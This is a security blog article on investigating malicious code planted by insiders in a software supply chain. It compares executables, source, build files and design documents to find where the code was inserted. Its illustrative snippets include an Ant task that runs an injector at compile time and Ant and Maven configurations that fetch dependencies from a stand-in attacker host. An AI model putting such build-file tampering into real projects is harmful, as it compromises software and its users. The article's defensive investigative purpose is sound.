Let’s imagine you discover a string of suspicious code within one of your applications. Perhaps a routine scan by your application testing team turns up evidence that malcode, such as a time bomb or backdoor, has been inserted by a malicious insider somewhere in your software supply chain.
First, you breathe a huge sigh of relief that you found the problem before it caused any lasting damage (data theft, keystroke logging, money siphoning, or other subversion of the application’s functions).
But, then you think: if a malicious insider inserted malcode into one application, what’s to stop them from targeting another?
You need to unmask the culprit.
Malicious code can be injected into an executable as late as the final production build, which means your adversary could be anyone within your software supply chain.
Your suspect list includes everyone with the access or ability needed to insert malcode.
Analysis of the executable alone will not provide enough information to narrow down the list of potential suspects. For that type of detection work, you need to get your hands on source code, build files and design documents. In combination, these assets can help you put together a timeline for when the malicious code was inserted. Here’s how it works.
If you find malicious code in both the executable and the source code of an application, you’ve got a strong indicator that your culprit is a member of the development team.
If the malicious code is not present in the source code, either it was removed from the source before analysis or it was injected at a later stage in the SDLC.
To narrow the search, consider where the source code was obtained. If it came from a repository in which every change is tracked and from which the build process retrieves code, removing malicious code without leaving a trace would be difficult, so its absence from the source strongly suggests the injection happened at a later stage in the SDLC.
Since malicious code can also be injected in an application at a stage after development, you also need to analyze build files.
For example, a build file can be made to execute a program that injects malicious code at build time by adding a simple task, as shown in the following Ant build file snippet:
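A minimal sketch of such a task (the target names, the injector executable, and the property names are hypothetical, invented for illustration):

```xml
<!-- Hypothetical Ant build file fragment: "inject", injector.exe,
     and the property names are illustrative, not from a real build. -->
<target name="inject">
  <!-- Runs an attacker-supplied program against the source tree
       before compilation -->
  <exec executable="injector.exe">
    <arg value="${src.dir}"/>
  </exec>
</target>

<!-- The depends attribute silently chains the malicious target
     into every normal build -->
<target name="compile" depends="inject">
  <javac srcdir="${src.dir}" destdir="${build.dir}"/>
</target>
```

Because the extra target runs via `depends`, a developer invoking the usual `compile` target would never see anything unusual on the command line.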
Build files can also be configured to retrieve malicious dependencies from locations outside the build servers, as shown in the following snippets:
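Two hedged sketches of what this might look like, one for Ant and one for Maven (the URLs, file names, and repository id are hypothetical):

```xml
<!-- Hypothetical Ant fragment: downloads a dependency from a server
     outside the approved build infrastructure -->
<target name="resolve">
  <get src="http://attacker.example.com/libs/commons-util.jar"
       dest="${lib.dir}/commons-util.jar"/>
</target>
```

```xml
<!-- Hypothetical Maven pom.xml fragment: reusing the id "central"
     overrides Maven Central, so dependencies are silently fetched
     from an attacker-controlled server instead -->
<repositories>
  <repository>
    <id>central</id>
    <url>http://attacker.example.com/maven2</url>
  </repository>
</repositories>
```

In both cases the dependency names look legitimate; only the retrieval location gives the tampering away.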
An insider can also replace existing dependencies in the build server’s local repository with malicious ones. During the build process, these malicious dependencies will be used even by a benign build file and will result in malicious code being injected into every application using those dependencies. The presence of malicious code in an executable where the source code and build file both appear benign points toward this case.
Design documents are helpful in determining whether code that looks malicious is actually malicious or not. For example, consider the snippet below from a web.xml. The code shows an application that has an alternate servlet with an alternate path mapping. A design document would show if this alternate path is required by design or if it is potentially malicious.
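A hypothetical web.xml excerpt illustrating this situation (the servlet names, classes, and URL patterns are invented for illustration):

```xml
<!-- Hypothetical web.xml fragment: an alternate servlet mapped to a
     second path alongside the expected one -->
<servlet>
  <servlet-name>AccountServlet</servlet-name>
  <servlet-class>com.example.AccountServlet</servlet-class>
</servlet>
<servlet>
  <servlet-name>AccountServletAlt</servlet-name>
  <servlet-class>com.example.AccountServletAlt</servlet-class>
</servlet>

<servlet-mapping>
  <servlet-name>AccountServlet</servlet-name>
  <url-pattern>/account</url-pattern>
</servlet-mapping>
<!-- Is this alternate path in the design, or a backdoor? Only the
     design documents can say. -->
<servlet-mapping>
  <servlet-name>AccountServletAlt</servlet-name>
  <url-pattern>/account-alt</url-pattern>
</servlet-mapping>
```

If the design documents make no mention of the alternate path, the second mapping deserves close scrutiny.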
The more information you have, the easier it will be to find the source of any insider threat. Once you believe you know the stage at which malcode was inserted, you may have enough information to trace actions back to a specific individual, or you may need to monitor the team more closely. Keep the investigation team small so you don’t raise any flags before your suspicions are confirmed.
About the Author
Rishabh Gupta is a Security Consultant at Synopsys. He specializes in static analysis and network security.